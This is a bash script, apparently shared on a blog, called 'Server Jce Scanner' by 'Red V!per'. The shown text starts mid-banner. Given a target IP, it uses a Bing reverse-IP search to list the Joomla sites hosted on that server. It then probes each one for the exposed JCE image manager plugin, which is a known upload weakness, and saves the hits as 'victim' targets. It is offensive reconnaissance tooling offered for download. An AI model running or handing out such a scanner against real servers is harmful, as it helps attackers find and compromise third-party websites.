echo -e '\E[34m'" || || "; tput sgr0
echo -e '\E[34m'" ||\E[31m _____ _ __ ___ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | __ \ | | \ \ / / | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___ __| | \ \ / /| |_ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | _ // _ \/ _\ | \ \/ / | | '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \ __/ (_| | \ / |_| |_) | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \_\___|\__,_| \/ (_) .__/ \___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m (_) \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ ___ ___ ___ ___ __ _ _ __ _ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | | (_| __/ \__ \ (_| (_| | | | | | | | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e " Server Jce Scanner "
echo
echo -e " BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [ INFO ] ===========-"
echo
read -p "[*] Target Ip : " IP
echo -e "$N"
}
#-------------------- Variables ----------------------------------------------------------------------------
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"
#-------------------- Scanning Jce Targets on Server -------------------------------------------------------
scan_jce_on_victim()
{
page=0
how_many=1
single_page=
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"
wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `
cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php
let page=$page+1
done
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
for domain in `cat domains.txt`
do
GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
if [ $check -eq 0 ]
then
echo -e "$B[+] www.$domain/ \e[1;32m[OK] \e[0m"
echo "$domain/" >> jce_server.lst
else
echo "[-] www.$domain/ [No] "
fi
done
rm -rf alldomain_bing.txt
}
#-------------------- Remove ------------------------------------------------------------------------
all_remove()
{
rm -rf alldomain_bing*
rm -rf domains_f*
rm -rf domains_f*
rm -f domain_bing*
rm -rf alldomain_bing*
rm -rf domains*
rm -rf jce_server*
}
#-------------------- Main Brain :D ------------------------------------------------------------------------
main()
{
Banner;
all_remove;
scan_jce_on_victim;
}
main;
Download : http://www.mediafire.com/view/g9955347r9ht6y7/jce-scanner.sh
Subscribe to:
Posts (Atom)